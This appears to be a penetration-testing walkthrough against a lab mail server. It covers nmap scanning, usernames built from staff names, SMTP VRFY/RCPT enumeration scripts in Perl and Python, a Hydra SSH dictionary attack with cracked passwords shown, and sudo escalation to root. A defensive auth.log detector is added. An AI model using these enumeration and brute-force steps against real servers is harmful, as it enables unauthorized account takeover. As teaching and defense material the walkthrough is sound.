root@asus:/mnt% nmap -sV -T4 -p22,25 mail.acme.com

Starting Nmap 7.01 ( https://nmap.org ) at 2018-12-28 19:39 MST
Nmap scan report for mail.acme.com
Host is up (0.00097s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)
25/tcp open  smtp    Sendmail 8.15.2/8.15.2/Debian-8
MAC Address: 08:00:27:0C:B6:CC (Oracle VirtualBox virtual NIC)
Service Info: Host: debian9.acme.com; OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.63 seconds
root@asus:/mnt%
Verify SMTP service is accepting connections
To verify that the SMTP service is actually accepting connections, we can connect to it with telnet and issue a few commands by hand.
root@asus:~/pentest_notes% telnet mail.acme.com 25
Trying mail.acme.com...
Connected to mail.acme.com.
Escape character is '^]'.
220 mail.acme.com ESMTP Sendmail 8.15.2/8.15.2/Debian-8; Fri, 28 Dec 2018 19:31:58 -0700;
HELO mail.acme.com
250 mail.acme.com Hello [77.x.x.x], pleased to meet you
quit
221 2.0.0 mail.acme.com closing connection
Connection closed by foreign host.
root@asus:~/pentest_notes%
Data set and user name enumeration
We need to build a list of candidate usernames for the system from the employee names collected during OSINT.
Employee Names from Company Website

ray barnes
eaton gill
melodie foley
gail ramsey
amanda ruiz
blake wise
chanda goodman
perry tucker
arden clayton
From here we try different combinations of first name, last name and initials.
Examples:

Ray Barnes = `rbarnes`
Ray Barnes = `rayb`
Ray Barnes = `r.barnes`
Ray Barnes = `ray`
Ray Barnes = `ray_barnes`
etc...
Our list should look something like this:
root@asus:~/pentest_notes% cat en.txt | sort | head -n 15
a.clayton
a_clayton
aclayton
amanda
amandar
arden
ardenc
a.ruiz
a_ruiz
aruiz
barnesr
blake
blakew
b.wise
b_wise
root@asus:~/pentest_notes%
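As an added example (this is not the post's own tooling), here is a small Python script that builds such a candidate list from the employee names above. It assumes names in "first last" form, uses the patterns visible in the list on this page plus a few last-name-first variants (those extra patterns are an assumption), and writes the result to users.txt, the file name the Perl VRFY script on this page reads.

```python
#!/usr/bin/env python3
"""Build candidate usernames from OSINT'd 'first last' names."""

# Constructed input: the employee names listed on the page.
EMPLOYEES = [
    "ray barnes", "eaton gill", "melodie foley", "gail ramsey",
    "amanda ruiz", "blake wise", "chanda goodman", "perry tucker",
    "arden clayton",
]

# Patterns applied to each name; f and l are the first/last initials.
# These are the forms seen in the page's list plus a few extra variants
# (the extras are an assumption, not something the page shows).
PATTERNS = [
    "{first}", "{last}", "{f}{last}", "{first}{l}", "{f}.{last}",
    "{f}_{last}", "{first}.{last}", "{first}_{last}", "{first}{last}",
    "{last}{f}", "{last}.{f}", "{last}_{f}",
]


def candidates(full_name):
    """Return the candidate usernames for one name, in pattern order."""
    parts = full_name.strip().lower().split()
    if len(parts) < 2:
        return parts                      # a lone token is its own candidate
    first, last = parts[0], parts[-1]     # middle names are dropped
    out = []
    for pattern in PATTERNS:
        user = pattern.format(first=first, last=last, f=first[0], l=last[0])
        if user not in out:               # patterns can collide on short names
            out.append(user)
    return out


def build_wordlist(names):
    """Deduplicated, sorted candidates for the whole name set."""
    return sorted({user for name in names for user in candidates(name)})


if __name__ == "__main__":
    wordlist = build_wordlist(EMPLOYEES)
    with open("users.txt", "w") as fh:    # the file the VRFY script reads
        fh.write("\n".join(wordlist) + "\n")
    print(f"{len(wordlist)} candidates written to users.txt")
```

Twelve patterns over nine names gives 108 candidates, which at one VRFY per second is under two minutes of probing; add patterns only as the target's naming convention becomes clear, since every extra form multiplies the noise on the mail server.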
Verifying mail users using VRFY command
There are three ways to check whether a user exists on an SMTP server: VRFY, EXPN (which expands aliases and mailing lists) and RCPT TO. In this example we use VRFY, since we know the server allows it. When it does not (Sendmail disables it with the novrfy or goaway PrivacyOptions and answers 252 "Cannot VRFY user" to every request), RCPT TO inside a MAIL FROM transaction is the fallback, because the server still has to decide whether it will accept mail for the address. Rather than typing the commands by hand, we can write a small script to run through the list.
----- SNIP -----
#!/usr/bin/env perl
use strict;
use warnings;
use Net::SMTP;

# Candidate usernames, one per line.
open(my $fh, '<', 'users.txt') or die "users.txt: $!";
my @users;
while (<$fh>) {
    chomp;
    push(@users, $_) if length;
}
close($fh) or die $!;

# One SMTP session for the whole run.
my $s = Net::SMTP->new('mail.acme.com', Timeout => 10)
    or die "cannot connect to mail.acme.com:25";

for my $user (@users) {
    # verify() is true on any 2xx reply to VRFY, so a server that answers
    # 252 to everything (VRFY disabled) would report every name as valid.
    print "$user user exists\n" if $s->verify($user);
    sleep(1);    # pace the requests
}
$s->quit;
----- SNIP -----
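The following Python version is an added example, not the post's script and not Net::SMTP. It speaks the SMTP exchange by hand so that the reply code decides the verdict: 250/251 counts as a hit, 252 means VRFY is disabled and the candidate is re-checked with MAIL FROM/RCPT TO, anything else is a miss. To run offline it includes a constructed fake listener whose replies imitate Sendmail's banner and codes; the user set, the acme.com domain and the 127.0.0.1 address are assumptions for the demo, and against a real target you would hand SmtpProbe its host name and port 25 instead.

```python
#!/usr/bin/env python3
"""SMTP user enumeration: VRFY, with an RCPT TO fallback when the server
answers 252 (VRFY disabled). A constructed Sendmail-like listener is
included so the exchange runs offline against 127.0.0.1."""
import socket
import threading


def read_reply(f):
    """Read one SMTP reply (multi-line '250-...' form included) -> (code, text)."""
    lines = []
    while True:
        line = f.readline().decode(errors="replace").rstrip("\r\n")
        if not line:
            raise ConnectionError("server closed the connection")
        lines.append(line)
        if len(line) < 4 or line[3] != "-":       # "250 text" ends the reply
            return int(line[:3]), "\n".join(lines)


class SmtpProbe:
    """Minimal client: HELO, VRFY, MAIL/RCPT, QUIT. No message is ever sent."""
    def __init__(self, host, port=25, helo="probe.invalid", timeout=10):
        self.sock = socket.create_connection((host, port), timeout=timeout)
        self.f = self.sock.makefile("rb")
        read_reply(self.f)                        # 220 banner
        self.cmd(f"HELO {helo}", 250)

    def cmd(self, line, *expected):
        """Send one command; return the reply code, checked against expected."""
        self.sock.sendall((line + "\r\n").encode())
        code, text = read_reply(self.f)
        if expected and code not in expected:
            raise RuntimeError(f"{line!r} -> {code} {text}")
        return code

    def vrfy(self, user):
        """'yes' on 250/251, 'unknown' on 252 (VRFY disabled), else 'no'."""
        return {250: "yes", 251: "yes", 252: "unknown"}.get(self.cmd(f"VRFY {user}"), "no")

    def rcpt(self, user, domain):
        """Fallback: open a transaction; unknown local users get 550 on RCPT."""
        self.cmd("RSET", 250)
        self.cmd("MAIL FROM:<probe@probe.invalid>", 250)
        return "yes" if self.cmd(f"RCPT TO:<{user}@{domain}>") in (250, 251) else "no"

    def enumerate(self, users, domain):
        found = []
        for user in users:
            verdict = self.vrfy(user)
            if verdict == "unknown":              # never count a 252 as a hit
                verdict = self.rcpt(user, domain)
            if verdict == "yes":
                found.append(user)
        return found

    def quit(self):
        self.cmd("QUIT", 221)
        self.sock.close()


class FakeSendmail(threading.Thread):
    """Constructed stand-in for the target, not real Sendmail. novrfy=True
    behaves like PrivacyOptions=novrfy: every VRFY is answered with 252."""
    def __init__(self, users, novrfy=False):
        super().__init__(daemon=True)
        self.users, self.novrfy = set(users), novrfy
        self.srv = socket.socket()
        self.srv.bind(("127.0.0.1", 0))           # ephemeral port, see .port
        self.srv.listen(1)
        self.port = self.srv.getsockname()[1]

    def run(self):
        conn, _ = self.srv.accept()
        send = lambda s: conn.sendall((s + "\r\n").encode())
        send("220 mail.acme.com ESMTP Sendmail 8.15.2/8.15.2/Debian-8")
        for raw in conn.makefile("rb"):
            verb, _, arg = raw.decode().strip().partition(" ")
            verb = verb.upper()
            if verb == "VRFY" and self.novrfy:
                send("252 2.5.2 Cannot VRFY user; try RCPT to attempt delivery")
            elif verb == "VRFY":
                send(f"250 2.1.5 <{arg}@acme.com>" if arg in self.users
                     else f"550 5.1.1 {arg}... User unknown")
            elif verb == "RCPT":                  # arg looks like TO:<user@domain>
                local = arg.partition(":")[2].strip("<> ").split("@")[0]
                send("250 2.1.5 ok" if local in self.users else "550 5.1.1 User unknown")
            else:                                 # HELO/MAIL/RSET -> 250, QUIT -> 221
                send("221 2.0.0 closing connection" if verb == "QUIT" else "250 2.0.0 OK")
                if verb == "QUIT":
                    break
        conn.close()
        self.srv.close()


def run_demo(novrfy):
    """Enumerate four candidates against the fake listener; return the hits."""
    srv = FakeSendmail({"rbarnes", "aclayton"}, novrfy=novrfy)
    srv.start()
    probe = SmtpProbe("127.0.0.1", srv.port)
    found = probe.enumerate(["rbarnes", "ray", "a.clayton", "aclayton"], "acme.com")
    probe.quit()
    srv.join(2)
    return found


if __name__ == "__main__":
    print("VRFY enabled:", run_demo(False), "VRFY disabled:", run_demo(True))
```

Both runs return the same two hits; the difference is only in how they were reached. A checker that treats every 2xx as success would report all four candidates as valid in the novrfy case, which is the failure mode to watch for with library helpers that hide the code.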
Now we can run it against the server to find which candidate usernames exist on the remote system.
root@asus:~/pentest_notes% ./enum_smtp_users.pl
rbarnes user exists
egill user exists
mfoley user exists
gramsey user exists
aruiz user exists
bwise user exists
cgoodman user exists
ptucker user exists
aclayton user exists
root@asus:~/pentest_notes%
All nine hits follow the first-initial plus last-name pattern, so the list built from first and last names alone was enough. Our next task is a dictionary attack against SSH using these usernames and a password list from rockyou.txt (the run below uses ry-smtp.txt, which from the 81 tries Hydra reports is a 9-password cut of it), to see what we can find.
Cracking User Logins With Hydra
For the dictionary attack we are going to use Hydra.
root@asus:~/pentest_notes% hydra -L smtp-users.txt -P ry-smtp.txt -t 4 mail.acme.com ssh
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-12-29 10:09:27
[DATA] max 16 tasks per 1 server, overall 64 tasks, 81 login tries (l:9/p:9), ~0 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: mail.acme.com   login: rbarnes   password: YOUSUCK!
[22][ssh] host: mail.acme.com   login: egill   password: fulori
[22][ssh] host: mail.acme.com   login: mfoley   password: pielagorda
[22][ssh] host: mail.acme.com   login: gramsey   password: shin4ever
[22][ssh] host: mail.acme.com   login: aruiz   password: bubba98
[22][ssh] host: mail.acme.com   login: bwise   password: 241729
[22][ssh] host: mail.acme.com   login: cgoodman   password: almaleticia
[22][ssh] host: mail.acme.com   login: ptucker   password: sdsmfree
[22][ssh] host: mail.acme.com   login: aclayton   password: lak6510
1 of 1 target successfully completed, 9 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-12-27 22:55:50
root@asus:~/pentest_notes%
Verify remote login users and passwords
Hydra reports a password for all nine accounts. Our next task is to test the logins over SSH to confirm they actually work.
root@asus:~/pentest_notes% ssh -l rbarnes 192.168.0.114
rbarnes@192.168.0.114's password:
Linux debian9 4.9.0-8-686 #1 SMP Debian 4.9.130-2 (2018-10-27) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
rbarnes@debian9:~$ id
uid=1005(rbarnes) gid=1005(rbarnes) groups=1005(rbarnes)
rbarnes@debian9:~$ sudo -s

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for rbarnes:
rbarnes is not in the sudoers file.  This incident will be reported.
rbarnes@debian9:~$
The login works, but rbarnes belongs to no group other than its own (no gid 27 sudo in the `id` output), so `sudo -s` is refused. Also note that the failed attempt is logged: sudo writes it to the auth log and, under its default mail_no_user setting, mails root, which is what "This incident will be reported" means. Since `id` already shows the group membership, checking it before running sudo avoids generating that alert at all.
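What that logging looks like from the defender's side, as an added example that is not part of the post: a Python pass over a constructed /var/log/auth.log excerpt (Debian 9 syslog format for OpenSSH and sudo; host name, PIDs, ports and the 192.168.0.50 source address are made up) that flags one source address failing against many distinct accounts, the password logins that followed from that address, and both the refused and the successful sudo-to-root.

```python
#!/usr/bin/env python3
"""Defender's view: pull the SSH dictionary attack and the sudo events out
of Debian's /var/log/auth.log. Regexes match the stock OpenSSH and sudo
syslog formats; the log lines below are constructed, not captured."""
import re
from collections import defaultdict

# Constructed sample auth.log excerpt; 192.168.0.50 plays the attacker box.
SAMPLE_LOG = """\
Dec 29 10:09:28 debian9 sshd[1201]: Failed password for rbarnes from 192.168.0.50 port 40210 ssh2
Dec 29 10:09:28 debian9 sshd[1203]: Failed password for invalid user ray from 192.168.0.50 port 40212 ssh2
Dec 29 10:09:29 debian9 sshd[1205]: Failed password for egill from 192.168.0.50 port 40214 ssh2
Dec 29 10:09:29 debian9 sshd[1207]: Failed password for mfoley from 192.168.0.50 port 40216 ssh2
Dec 29 10:09:30 debian9 sshd[1209]: Failed password for gramsey from 192.168.0.50 port 40218 ssh2
Dec 29 10:09:31 debian9 sshd[1211]: Accepted password for rbarnes from 192.168.0.50 port 40220 ssh2
Dec 29 10:12:03 debian9 sudo:  rbarnes : user NOT in sudoers ; TTY=pts/0 ; PWD=/home/rbarnes ; USER=root ; COMMAND=/bin/bash
Dec 29 10:15:44 debian9 sshd[1250]: Accepted password for aclayton from 192.168.0.50 port 40230 ssh2
Dec 29 10:15:52 debian9 sudo: aclayton : TTY=pts/1 ; PWD=/home/aclayton ; USER=root ; COMMAND=/bin/bash
Dec 29 11:00:00 debian9 sshd[1300]: Accepted publickey for deploy from 10.0.0.5 port 50000 ssh2
Dec 29 11:00:05 debian9 sshd[1301]: Failed password for deploy from 10.0.0.5 port 50001 ssh2
"""

SSH_FAILED = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port")
SSH_ACCEPT = re.compile(r"sshd\[\d+\]: Accepted (\w+) for (\S+) from (\S+) port")
SUDO_DENIED = re.compile(r"sudo:\s+(\S+) : user NOT in sudoers")
SUDO_ROOT = re.compile(r"sudo:\s+(\S+) : TTY=\S+ ; PWD=\S+ ; USER=root ; COMMAND=(\S+)")


def analyze(log_text, min_users=3):
    """Return the findings a SOC would want from this excerpt."""
    failed_users = defaultdict(set)   # source ip -> accounts it failed against
    accepted = []                     # (method, user, ip) in log order
    sudo_denied, root_shells = [], []
    for line in log_text.splitlines():
        if m := SSH_FAILED.search(line):
            failed_users[m[2]].add(m[1])
        elif m := SSH_ACCEPT.search(line):
            accepted.append((m[1], m[2], m[3]))
        elif m := SUDO_DENIED.search(line):
            sudo_denied.append(m[1])
        elif m := SUDO_ROOT.search(line):
            root_shells.append((m[1], m[2]))
    # One source failing against many distinct accounts is the signature of a
    # dictionary/spray run; a user mistyping a password fails against one.
    spray = {ip: sorted(users) for ip, users in failed_users.items()
             if len(users) >= min_users}
    # Password logins that succeeded from a spraying source are the accounts
    # to treat as compromised (key-based logins from elsewhere are not).
    compromised = [(user, ip) for method, user, ip in accepted
                   if method == "password" and ip in spray]
    return {"spray": spray, "compromised": compromised,
            "sudo_denied": sudo_denied, "root_shells": root_shells}


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_LOG).items():
        print(f"{key:12}: {value}")
```

Run on the real file the same logic gives you the full list of cracked accounts in one pass, which is why a noisy SSH dictionary attack against a host that ships its auth log anywhere is usually the first thing a blue team sees.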
Privilege Escalation to root
Trying the other cracked accounts, we find one that is in the sudo group (gid 27).
root@asus:~/pentest_notes% ssh -l aclayton 192.168.0.114
aclayton@192.168.0.114's password:
Linux debian9 4.9.0-8-686 #1 SMP Debian 4.9.130-2 (2018-10-27) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Dec 26 20:12:09 2018 from 192.168.0.100
aclayton@debian9:~$ id
uid=1001(aclayton) gid=1001(aclayton) groups=1001(aclayton),27(sudo)
aclayton@debian9:~$ sudo -s

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for aclayton:
root@debian9:/home/aclayton# id
uid=0(root) gid=0(root) groups=0(root)
root@debian9:/home/aclayton#

As you can see, we just issued `sudo -s` with the password we cracked earlier and got a root shell, starting from nothing more than a list of names on the company website.